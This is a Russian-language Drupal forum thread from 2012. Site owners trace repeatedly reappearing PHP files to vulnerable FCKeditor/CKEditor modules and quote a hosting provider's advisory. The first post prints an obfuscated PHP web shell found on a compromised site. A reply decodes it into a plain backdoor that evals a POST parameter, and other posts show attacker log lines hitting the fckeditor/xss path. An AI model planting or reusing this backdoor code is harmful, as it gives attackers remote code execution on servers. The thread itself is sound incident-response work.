Посторонние файлы в корне сайта

Главные вкладки

Аватар пользователя jeweller jeweller 27 сентября 2012 в 18:05

В корне сайта обнаружены посторонние фалы php с разными названиями. Например wtm7991n.php.
фалы удалял, сменил пароли ftp, какое-то время не было. Сегодня опять появился посторонний файл.
Что делает этот код и где искать уязвимость?

Содержимое файла

<?php$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit; ?>

Комментарии

Аватар пользователя sg85 sg85 27 сентября 2012 в 18:28

Забавный код))
Запускает вот этот PHP скрипт:
<?php
$p=@$_POST['p1'];
$m=sprintf("%c",92);
if(strpos($p,"$m$m")){$p=stripslashes($p);}
ob_start();
eval($p);
$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
echo(strlen($temp)."\n".$temp);
exit;
?>
Версия ядра последняя? Я бы его еще принудительно обновил, а то мало ли, может еще пара сюрпризов в ядре теперь сидит.

Аватар пользователя jeweller jeweller 1 октября 2012 в 20:46

обновил ядро до 6.26
машину проверил антивирусом,
пароли ftp сменил и в клиенте на храню
пароль админа сменил

где уязвимость есть идеи?

Аватар пользователя jeweller jeweller 1 октября 2012 в 20:46

обновил ядро до 6.26
машину проверил антивирусом,
пароли ftp сменил и в клиенте на храню
пароль админа сменил

где уязвимость есть идеи?

Аватар пользователя jeweller jeweller 7 октября 2012 в 23:55

Судя по логам уязвимость не в ftp. Кроме меня никто не заходил и подобные файлы не закачивал.

Если я правильно мыслю уязвимость надо искать либо в ядре, либо более вероятно - в модулях?

Файл wtm2973n.php, время создания 07.10.2012, 15:28:01.

к файлу обращаются с одного ip: 81.163.156.195

вот логи за сегодня с этого ip:

81.163.156.195 - - [07/Oct/2012:16:27:59 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"

81.163.156.195 - - [07/Oct/2012:16:28:01 +0400] "GET /wtm2973n.php HTTP/1.1" 200 109 "-" "-"

81.163.156.195 - - [07/Oct/2012:17:10:04 +0400] "POST /wtm2973n.php?showimg=1&cookies=1 HTTP/1.1" 200 84 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8"

в первой записи упоминается fckeditor. Это и есть источник уязвимости?

Аватар пользователя sg85 sg85 8 октября 2012 в 8:42

"jeweller" wrote:
Если я правильно мыслю уязвимость надо искать либо в ядре, либо более вероятно - в модулях?

Если Друпал развернут правильно, создать с помощью друпал эти файлы технически невозможно, у него просто нет на это прав. Обычно подобное можно совершить сперев пароль от FTP или SSH, ибо для остального обычно нет доступа, но все равно, проверьте права доступа ко всем папкам, хотя на сколько помню, друпал обычно ругается, если у него есть доступ куда не надо.

Ну и кроме FTP нужно посмотреть и логи SSH

"jeweller" wrote:
в первой записи упоминается fckeditor. Это и есть источник уязвимости?

Такое возможно если доступ настроен неверно и библиотеку брали не из официальных источников(именно логическое И)

Аватар пользователя xSPiRiTx xSPiRiTx 8 октября 2012 в 17:26

на джумле у меня половина скриптов была заражена троянами. менял пароли, скрипты перезаливал. через время опять тоже самое. оказалось, что у другой стороны, которая имела аккаунт в админке и доступ к серверу компьютер был заражен вирусами.

Аватар пользователя Artemiy-tlt63 Artemiy-tlt63 11 октября 2012 в 20:26

Мой товарищ обнаружил такой же код примерно в конце сентября. А я у себя сегодня... Версия друпал 6. Пытаемся вылечиться Sad

Аватар пользователя jeweller jeweller 11 октября 2012 в 21:37

Уязвимость наиболее вероятно в fckeditor. В сети полно информации об этой уязвимости в старых версиях - возможность загружать и исполнять произвольные файлы.

На эксперименты времени нет. Поэтому пока обновил fckeditor до последней версии и заблокировал в .htaccess ip, с которого обращались к зараженным файлам.

Двое суток - пока взлома нет. Ранее почти каждый день приходилось удалять файлы, а на следующий день они появлялись опять.

Аватар пользователя Artemiy-tlt63 Artemiy-tlt63 11 октября 2012 в 22:03

Находил тему, что на сайтах на bitrix`е тоже находили такой кусок кода. Видмо действительно взлом происходит не через ядро друпал.

Аватар пользователя sg85 sg85 12 октября 2012 в 12:00

"jeweller" wrote:
Уязвимость наиболее вероятно в fckeditor. В сети полно информации об этой уязвимости в старых версиях - возможность загружать и исполнять произвольные файлы.

Вся соль в том, что при корректных настройках доступа, даже если дать права администратора 3му лицу на сам сайт, никаких файлов за пределами, например, sites/default/files/ никаким кодом создать не получится, можете поэкспериментировать - попробуйте создать файл средствами php в корне сайта, если получится - значит доступ настроен через одно место. С 7м ядром по сложнее, т.к. оно имеет доступ за пределы "рабочих" папок средствами ftp

Аватар пользователя jeweller jeweller 19 октября 2012 в 14:33

История повторяется.
в корень сайта размещают php файлы зараженные, по мнению AVG трояном.

Обновления не помогли. Блокировка ip тоже. Через неделю атака продолжилась с другого ip той же подсети. Пока заблокировал подсеть. Но это не решение.

Пароли ftp неоднократно менял, машину на вирусы проверял.

Есть идеи?

в логах первые обращения с данного ip

81.163.142.21 - - [18/Oct/2012:19:46:55 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"
81.163.142.21 - - [18/Oct/2012:19:46:56 +0400] "GET /wtm3543n.php HTTP/1.1" 200 109 "-" "-"

затем появляется
81.163.142.21 - - [19/Oct/2012:01:09:17 +0400] "POST /wtm3543n.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.1" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
81.163.142.21 - - [19/Oct/2012:01:09:17 +0400] "GET /wp-conf.php?t6157n=1& HTTP/1.1" 200 24976 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"

wp-conf.php заражен.

что означает первая запись?
81.163.135.47 - - [09/Oct/2012:22:17:44 +0400] "POST /?q=fckeditor%2Fxss HTTP/1.1" 200 4 "-" "-"

Аватар пользователя Artemiy-tlt63 Artemiy-tlt63 19 октября 2012 в 20:07

Примерно 11 числа я почистил свои сайты, и сегодня-вчера файлы снова появились.
При том у меня заражены два сайта, никак не связанные, и храняться на разном хостинге. Оба сайта на друпал 6.

Аватар пользователя xSPiRiTx xSPiRiTx 20 октября 2012 в 2:39

чисти компьютеры редакторов и модеров сайта, а так же свой
ибо так если подумать...два разных сайт на разных хостингах именно у тебя подвергаются вирусной атаке.....

Аватар пользователя Artemiy-tlt63 Artemiy-tlt63 21 октября 2012 в 12:04

Я бы даже сказал более, у пользователя jeweller, я так понимаю твориться тоже самое, И (!) у нас это происходит в одно время, у меня тоже второе заражение было 18 октября.

Аватар пользователя jeweller jeweller 30 октября 2012 в 20:22

В продолжение и завершение темы.

Другой не зараженный аккаунт находится на it patrol.
От них получил сообщение.

«Уважаемые клиенты.

В последнее время на сайтах наших клиентов были зафиксированы многочисленные внедрения шелл-скриптов, с помощью которых злоумышленники делали спам-рассылки. Мы провели анализ и выяснили, что хакеры используют различные уязвимости в модулях FCKeditor (все версии), и CKEditor(CKEditor 6.x-1.x версий до 6.x-1.9, CKEditor 7.x-1.x версий до 7.x-1.7). С помощью данных уязвимостей злоумышленник может запускать произвольные сценарии на стороне клиента, а также исполнять сторонний PHP-код(если включен модуль PHP Filter) на стороне сервера.

Более подробно о данных уязвимостях можно почитать в issue на drupal.org и статье Уязвимости в CKEditor и FCKeditor.

В связи с указанной выше информацией мы настоятельно рекомендуем:

Если вы используете модуль FCKeditor - заменить его на CKEditor последней версии.
Если вы используете модуль CKEditor 6.x-1.x версий до 6.x-1.9 или CKEditor 7.x-1.x версий до 7.x-1.7 - обновить данный модуль до последней версии.
Со своей стороны мы работаем над тем, чтобы выявить и очистить уже зараженные аккаунты. Также наши администраторы занимаются очисткой очереди писем от спама, что может привести к тому, что некоторые не спам-письма могут быть удалены по ошибке.

Просим с пониманием отнестиcь к указанным выше рекомендациям и выполнить их как можно скорее.»

////////////

Уязвимые версии:
Drupal модуль FCKeditor 6.x-2.x версий до 6.x-2.3
Drupal модуль CKEditor 6.x-1.x версий до 6.x-1.9
Drupal модуль CKEditor 7.x-1.x версий до 7.x-1.7

Описание:

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на системе.

1. Уязвимость существует из-за недостаточной обработки определенных входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

2. Уязвимость существует из-за недостаточной обработки неизвестных входных данных. Удаленный пользователь может выполнить произвольный PHP код.

Примечание: Успешная эксплуатация уязвимости № 2 в FCKeditor 6.x требует наличия привилегий, а в CKEditor 6.x наличия привилегий access ckeditor

URL производителя: http://drupal.org/

Решение: Для устранения уязвимости установите исправления с сайта производителя.